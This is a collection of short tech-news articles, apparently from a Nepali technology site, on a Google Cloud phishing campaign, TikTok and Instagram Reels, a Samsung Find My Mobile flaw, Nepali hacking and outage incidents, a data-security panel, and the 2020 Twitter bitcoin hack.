Threat actors were found exploiting Google Cloud to host malicious payloads and launch phishing attacks.
Google may have dealt with this vulnerability, but it is up to us to stay vigilant and protect our data. In this article, we will also be discussing some ways how you can do that, especially on cloud services.
Let’s break down the Google Cloud Phishing Journey.
How did it Happen?
First, threat actors uploaded a PDF to Google Drive. They disguised the PDF to resemble a Microsoft SharePoint notice, but in reality, it contained a link to an MS Access Document.
Image: Check Point
Once clicked, the link redirected the user to a phishing page hosted on storage.googleapis[.]com/asharepoint-unwearied-439052791/index.html.
The phishing page would then prompt the user to login with their Office 365 or organization email and password.
After the user would enter the login credentials, the page redirected to a real PDF report published by a renowned global consulting firm.
And, that’s the trick! Users wouldn’t be suspicious even for a second because they would think that they were viewing something useful.
Also, because the phishing page is hosted on Google Cloud Storage.
It is also difficult for security professionals to identify or detect such phishing campaigns for the same reason.
“However, viewing the phishing page’s source code has revealed that most of the resources are loaded from a website that belongs to the attackers, prvtsmtp[.]com:”, the report stated.
After further investigation of the website, researchers came to know that it was resolved to a Ukrainian IP address.
What Next?
Well, Google has a zero-day tolerance policy. So, it immediately suspended the phishing URL and all those associated with it.
There are also some incidents in the past where threat actors would host phishing pages using Dropbox and Microsoft Azure.
Check Point also suggested some precautionary measures to protect users against such phishing attacks.
Have a look at the following points:
Beware of lookalike domains and spelling errors. Unfamiliar email senders and spelling errors are a straight giveaway.
Take caution opening or downloading files received via email from unknown senders. Try to make sense of any suspicious call-to-action and subject line.
Ensure that you order products/services from an authentic source. One way to do that could be NOT clicking on promotional links in emails. Try to Google the desired service instead.
Beware of ‘special’ offers that could be nothing but a scam. For instance, ‘an exclusive cure for coronavirus for $150’. That should be a dead giveaway.
Try to keep separate passwords between different applications and accounts.
As they say, “Users’ mailboxes are the front door into your organization.”
Email security has become a necessity, which needs proper attention in organization architecture.
How often do you come across such potential scams or suspicious emails?
Ever since Instagram Reels has marked its presence in the internet world, people aren’t just shutting up about how opportunistic this venture seems. Let’s discuss TikTok vs Instagram Reels once and for all. Was it just pure coincidence or an opportunistic venture?
What is TikTok?
According to Wikipedia: “TikTok/Douyin is a Chinese video-sharing social networking service owned by ByteDance, a Beijing-based Internet technology company founded in 2012 by Zhang Yiming. It is used to create short music, lip-sync, dance, comedy and talent videos of 3 to 15 seconds, and short looping videos of 3 to 60 seconds.”
What is Instagram Reels?
Very similar to Tiktok, Reels is Facebook’s recent rival venture against Tiktok(as people claim). It was launched on August 5 in the US. Here, users can record and edit short videos along with the background music akin to TikTok. The video length can be upto 15 seconds. However, it is not separate from the Instagram app itself. It can be considered an extension of a wide range of Instagram features.
Were Instagram Reels release just a coincidence?
We are all aware of the Tiktok controversy. Its future has been in hanging balance in the US. Similarly, owing to geopolitical issues, India has banned TikTok and some 58 other Chinese apps. Therefore, this is an attempt of Facebook to harness the opportunity, claim the experts.
It’s no hidden fact that Instagram Reels is very similar to the TikTok video-sharing platform. But the product head of Instagram recently told the reporters that the release timing was just a coincidence. They had been planning it for a long time. Whatever the case, it will be interesting for us to see how Reels performs compared to Tiktok.
Vishal Shah said,”[TikTok] certainly didn’t invent short-form video, but they innovated it,” Shah told reporters, “We’ve been clear that formats in the past were inspired by other companies…I believe that consumers having choice results in better products.”
Number of Users[TikTok vs Reels]
Instagram has more than 1 billion global users. Whereas, Tiktok has little over 2.3 billion global downloads. Whereas, in the US, Tiktok users are around 100 million and Instagram between 100 to 150 million.
Instagram Reels was first launched in Brazil in November 2019 for testing purposes. Today, it has expanded to India, Germany, and some other countries. Slowly, it is planning to go global.
Meanwhile, it will be interesting to see how this rivalry moves forward. Will Instagram Reels sustain in the long run? Let us know in the comments below.
According to the Wall Street Journal, Tiktok tracked Android users’ data for over a year until November 2019. This is yet another blow for tiktok in the recent turmoil the company has been facing.
The android app reportedly collected the MAC addresses of the devices against the google privacy policy. The app collected the users’ MAC addresses as soon as a new user installed the app. The MAC address then acted as an advertisement ID based on which the company tracked users’ behavior. This tracked user behavior and helped in the advertisement.
Google has banned the developers to collect the mac addresses and IMEI numbers of android devices since 2015. But Tiktok violated the rule after finding a loophole in the policy. Tiktok tracked the users for 15 months until November 2019. Similarly, Other android apps also did the same. The number of apps that did the breach was around 350.
With over 200 million users, Tikotok’s biggest market outside of China was India. The company is facing a great deal of loss after the incident took place last June.
According to recent reports, Tiktok is currently in talks with Reliance India to come up with an agreement to survive the situation.
A little on background on Tiktok
According to Wikipedia,” TikTok/Douyin is a Chinese video-sharing social networking service owned by ByteDance, a Beijing-based Internet technology company founded in 2012 by Zhang Yiming. It is used to create short music, lip-sync, dance, comedy and talent videos of 3 to 15 seconds, and short looping videos of 3 to 60 seconds.”
It will be interesting to see how Tiktok overcomes these unprecedented events in the future. Will it be able to survive the political agendas concerning China and the other countries?
Meanwhile, Nepali users of Tiktok have been very active and enjoying the platform to the fullest.
Have your say on this in the comment section below.
Facebook has open-sourced Pysa through GitHub, an open-source repository. Pysa is an app that finds and fixes bugs. The app analyzes the code and how data flows through it. Pysa is an acronym for Python Statistic Analyzer.
It is a security tool built upon Facebook’s type checker for Python. Pysa helps detect a wide range of issues. It detects common web app security issues and vulnerable code snippets. And it helps Facebook scale their application security issues for Python.
“Pysa is an automated analyzer that controls quality and security in the codebase.”, said Facebook.
Python’s code base powers the millions of Instagram’s servers. To manage such codebases, security tools like Pysa are essential. Pysa identifies bugs in almost real-time whereas reviewing manually takes days. The quick response helps them eliminate issues before it reaches their system.
“We’ve made it open-sourced with many definitions to help it find security issues”, stated Facebook on Saturday. Pysa detected 44% security bugs in Instagram’s server-side Python.
Facebook also built a statistic-analysis tool Zoncolan. It helps in analyzing more than 100 million lines of the Hack Code. Engineers have prevented numerous security issues through Zoncolan.
“The success of Zoncolan is what motivated us to build Pysa”, said Facebook. Internally built by Facebook, Pysa is fine-tuned through months of testing and improvements.
Another upside of Pysa is its extendability. The tool can be extended to adapt to other frameworks easily.
New research has revealed a serious security vulnerability in the ‘Find My Mobile’ – an Android app that comes pre-installed on most Samsung smartphones.
Char49, a Portugal-based cybersecurity provider, revealed its findings on the android app at the DEF CON conference last week.
The research suggests that this flaw had the potential to allow remote attackers to track victim’s real-time location and monitor their call activities.
In addition, the attackers could even check messages and delete data from the phone.
According to Char49’s Pedro Umbelino, attackers could cause serious privacy implications via IMEI and location tracking. Moreover, it could even cause catastrophic impacts such as the permanent denial of service via phone lock and factory reset.
“This attack was tested successfully on different devices (Samsung Galaxy S7, S8, and S9+”, the report suggests.
Samsung addressed these vulnerabilities after flagging the exploit as a “high impact vulnerability”.
Vulnerabilities… More than One?
According to Char49, there were a total of 4 different vulnerabilities in the Find My Phone app. In fact, attackers could’ve easily exploited the targeted device using a malicious app.
The app checks for a specific file on the phone’s SD card (“/mnt/sdcard/fmm.prop”) in order to load a URL (“mg.URL”). Thus, this allows a malicious app to create this file which a bad actor can use to potentially hack the communications with the server.
In this way, the attacker can get access to several personal information about the user.
Furthermore, the malicious app installed on the device uses an exploit chain that leverages two different unprotected broadcast receivers. These would allow redirecting commands intended for Samsung’s servers from the Find My Mobile app to a different server under the attacker’s control.
In fact, the malicious server later also forwards the request to the legitimate server and retrieves the response. However, that doesn’t happen before it injects its own commands in the server responses.
Consequently, the attackers now have full control over the flawed Samsung device.
And ironically, an app that’s supposed to safeguard users against information loss becomes the villain. The flaw basically defeats the app’s very purpose.
The news of unethical hacking happening rampantly is rather growing these days. In a recent incident, NTC’s server hacker has been released on bail.
Diwakar Deuja, a Nepal Government employee, hacked Nepal Telecom‘s server. He, then, made a recharge of Rs.24,000. After almost 15 days, The Kathmandu District Court released him on a bail on July 29.
The bail amount was Rs. 50,000. As per the claim, he had misused around Rs. 24,000 while recharging.
Deuja was working at the Urban Development and Building Office, Dhankuta as a computer operator. Judge Kamal Prasad Pokhrel made the verdict on this matter.
Before this incident, the police had been claiming that Deuja had also taken financial advantage by controlling various packages of Nepal Telecom.
Nepal Telecom had filed the complaint on July 27. Then, The Central Investigation Bureau (CIB) of Nepal Police had initiated the investigation. Meanwhile, The Bureau had already arrested Deuja from Dhankuta on July 15.
As per the Electronic Transactions Act 2063, CIB had sent him to the Nepal police Cyber Bureau.
These types of incidents are growing day by day. What do you feel is the root cause behind it? Why are the civil servants involved in such embarrassing activities?
Kathmandu. Unless you are living under a rock, the cases of security breaches are not new news for you. Keeping that in mind, the Nepal Telecommunications Authority [NTA] makes security audits of the concerned parties mandatory.
The regulatory body has also asked the telecommunication and ISP companies to submit the audit report to the authority.
Recent incidents of hacking have been painting a negative picture of the ISP’s and telecommunication sectors. All internet users are having grave concerns about their privacy. Hence, the authority has addressed the issue.
The body has taken the decision considering the nationwide criticism of these incidents.
NTA spokesperson Meen Prasad Aryal said that they issued the directive to improve the situation. Additionally, they aim to prevent the recurrence of such incidents.
“If the service providers do not follow the directives of the regulator, they may be fined up to Rs 50,000,” he said. Based on the Telecommunications Act 2053 BS, the regulatory body addressed the issue.
He also said that the service providers should compensate for the damage caused by non-compliance.
Have your say on this decision in the comment section.
Nepal Stock Exchange (NEPSE) has recently confirmed that there have been attempts to extract a large number of details from its website using various codes.
NEPSE, the only stock exchange company in Nepal, has warned to take legal actions against those who try to block the service by establishing unauthorized access to its official website.
Company Spokesperson Murahari Parajuli said that there were delays in the display of transaction details related to NepalStock.com.np and NepalStock.com. Moreover, there was an issue due to which transactions were not visible for a certain period of time in certain areas.
A study by NEPSE found that there were attempts to extract a large amount of data from all the websites using different codes.
Consequently, there was an artificial increment in the number of people trying to view the details on the website. In fact, the company has mentioned that it is inconvenient for the general public.
The company is taking technical measures to tackle this issue. Furthermore, NEPSE has warned to take legal actions if such illegal efforts continue in the coming days.
Spokesperson Parajuli said that the site was loaded while trying to pull data excessively.
Among the culprits were Banks and financial institutes, portfolio management companies, and online sites.
For now, he said that the company has issued information for awareness. However, the company won’t hesitate to go to the police for action if it does not stop.
The primary server of the National Information Technology Center (NITC) inside Singha Durbar went down on Saturday (July 25).
The server of NITC manages the government data center. Experts say that the main server of the government went down due to the inability to manage it properly.
However, Ramesh Pokharel, Information Officer at the Center, said that the server went down due to a nearby transformer.
“A nearby transformer has collapsed due to a power outage. The shock also damaged both our generators in the data center which caused the problem since 9:30 am,” he said. “Even now the power is unstable.”
Consequently, all government sites went down.
Information Officer Pokharel informed us that the center has completed the work of replacing the battery of the generator. However, the websites were still not operational due to the high number of hits in the data center, according to him.
Important websites including the Prime Minister’s Office, Public Service Commission, and the Ministry of Finance had stopped working following the problem. Likewise, the email server of the Government of Nepal also went down.
Pokharel further added that although the Center was operating a recovery data center in Hetauda, it was not working.
Generally, both data centers manage government servers. Thus, one would assume that the service can be maintained by using the server on the other side. But, it was not the case.
Pokharel claimed that even though there was a backup in Hetauda, they could not use it as the DNS was not on.
However, experts say that such problems are recurring due to the poor management of NITC. Most sites have become operational now but NITC is looking for potential damage due to the issue.
Women in Big Data-Nepal Successfully Hosts Virtual Panel Discussion on Data Breach and Security in Nepal.
Women in Big Data (WiBD)- Nepal organized a virtual panel discussion session titled “Belt Your Data” to share knowledge and facts on the status of data security and breaches in Nepal. The event was hosted on the Zoom Platform on 19 July, Sunday. A total of 125 interested audiences participated in the session.
The three panelists were Dovan Rai, Narayan Koirala, and Prabin Subedi. The session was moderated by Anjani Phyual (Asia lead of WiBD) and Yudina Poudel (Executive Member-Networking, WiBD). All the active members of WiBD-Nepal were also present in the event.
The event was categorized into three phases. From “What is data?” to “How data breach occurs?” to “How to prevent a data breach?” were covered with the focus on the context of Nepal. Numerous laws and acts specifically to data and data breach were discussed, which gave the general audience a detailed understanding of the current policies in the context of Nepal.
Sharing her ideas on the session, Dovan Rai – a Data scientist and Education Coordinator – said, “Data Security is like wearing a mask for preventing COVID-19; everyone should protect their data to prevent data breach”. She also shared examples of a few globally known data hacks and breaches to aware of the audience.
Similarly, Narayan Koirala, who has profound knowledge on the technical field, said, “Both data protection and data breach are growing side by side in Nepal. The level of data security has reached the next level, and depth of data defense mechanisms has also increased in the country”. This calmed the audience amid the chaos of data breach and its negative impact on our data.
Likewise, the third panelist Prabin Subedi, an active practicing lawyer of Nepal, shared, “Along with being aware of the laws and acts related to data in Nepal, one should be more aware of their data and its privacy.” Moreover, he said that Nepal is trying its best to implement data-related laws and has reached one of the top countries in Asia as well as the world to practice such laws.
Highlighting more on the event, it had an active question and answer sessions among the audience and panelists. The feedback taken from the audience poll suggested the incident was fruitful to all the participants. The game went interactively and interesting as few votes were generated in between the discussion. This kept the audience engaging.
After the success of this first event, Women in Big Data Nepal is looking forward to organizing more activities that can help develop awareness and educate people on data-related topics.
Women in Big Data-Nepal is all set to organize a Virtual Panel Discussion on the topic ‘Belt Your Data’ on 19 July, Sunday. The event aims to share knowledge and facts on data breach cases focusing more on the context of Nepal and is being conducted on the Zoom platform. Over 500 interested audiences are expected to participate in the session.
Women in Big Data-Nepal to host Panel Discussion on ‘Belt Your Data’ for Data Enthusiasts. The program aims to share knowledge and facts on data breach cases focusing on the context of Nepal and promote data literacy and awareness.
Data breaches – incidents that expose confidential or protected information – are increasing in Nepal in recent times. In this digital age, data is wealth. It should be kept safe and used wisely. This panel discussion intends to disseminate its participants with an awareness of data breach and ways to prevent it.
The three panelists of the event are: Dovan Rai – a Data scientist & Education Coordinator, Narayan Koirala – Managing Director of Eminence Ways Pvt. Ltd., and Prabin Subedi – a Lawyer specialized in Information Communication Technology Law.
During the event, the audience can put forward any topic related concerns to the panelists and have a one-to-one discussion on the topic. Analyzing the few recent data breach cases of Nepal, this event aims to disseminate its attendees with all the necessary precautions and laws one should know regarding the data and its use.
‘Belt Your Data’ event is a great opportunity for the audience to collect ideas on the domain ‘Data Breach’ from the experts since data has become the most crucial part of our life and needs to maintain better privacy in this 21st century.
All interested participants, regardless of gender, can register for participation in the event by filling up this form.
Computer operator of Urban Development and Building Office, Dhankuta, has been arrested for hacking the server system of Nepal Telecom’s mobile app.
Central Bureau of Investigation (CIB) arrested Diwakar Deuja (28) of Pakhribas Municipality-5 in Dhankuta on Wednesday.
The Police have also recovered two laptops and two mobile phones from him after the arrest.
The arrestee hacked the system both to use and sell Nepal Telecom’s packages illegally, according to the Bureau.
On June 26, Nepal Telecom lodged a complaint alleging that they had suffered losses due to repeated hacking using untraceable internet technology. The complaint stated that it had damaged the company’s revenue and its business image.
The police arrested Deuja while investigating the same complaint.
Dilli Ram Adhikari, Managing Director of Nepal Telecom says, “Telecom immediately came to know about the suspicious activity regarding unauthorized access and filed the complaint. With help from CIB, we managed to arrest the suspect.”
He also informed that Telecom was able to avoid a huge loss by putting an end to the illegal activity in its initial phase.
Preparations are underway to take necessary action against the arrestee as per the Electronic Transactions Act 2063 BS.
Furthermore, the bureau has sent a cyber bureau to Kathmandu for further investigation.
Billionaires Bill Gates, Elon Musk, and Jeff Bezos are among the many prominent personalities who suffered a major Twitter hack.
The official Twitter accounts of such popular people and also companies were hacked in an apparent Bitcoin scam.
Moreover, the official accounts of Barack Obama, Joe Biden, and Kanye West tweeted requesting a donation of a thousand dollars in cryptocurrency (Bitcoin).
“Everyone is asking me to give back,” a tweet from Bill Gates’ account said. “You send $1,000, I send you back $2,000.”
In fact, companies like Apple also fell victim to the cyberattack. “We are giving back to our community, “ said a tweet from Apple’s official account. “We support Bitcoin and we believe you should too!”
How did Twitter Handle the Situation?
Twitter removed all these “fake” tweets within a few minutes of posting. Also, it took immediate action to stop certified accounts marked with blue ticks from tweeting altogether.
CEO Jack Dorsey tweeted on Wednesday, “Tough day for us at Twitter. We all feel terrible this happened.”
He informed that Twitter started diagnosis of the attack and would share everything as soon as they find more information.
Similarly, the social media giant denied password reset requests and disabled other “account functions” for a while.
Worst Social Media Hack To Date..?
At least it is what Dmitri Aperovitch, Co-founder of Cybersecurity company CrowdStrike said according to a BBC report.
The official account of the Chief of Tesla and SpaceX, Elon Musk, tweeted about doubling any Bitcoin payment sent to the address of his digital wallet.
Who Was Behind The Attack?
BBC reported from a security source that a web address – cryptoforhealth.com – was registered by a cyberattack using the email address [email protected].
“Anthony Elias” registered the website. Or, at least the attackers used this name for the purpose.
Cryptoforhealth is also a registered Instagram handle set up contemporaneously to the hack.
“It was us”, read the description of the profile alongside a smiley emoticon.
Furthermore, there was a story on the Instagram account with a message. It read: “It was a charity attack Your money will find its way to the right place.”
The official Twitter Support (@TwitterSupport) account tweeted that it is well aware of the security incident impacting users on Twitter. In addition, it said that it would update everyone shortly.
The FBI’s San Francisco field office put out a statement advising people not to engage in such scams.
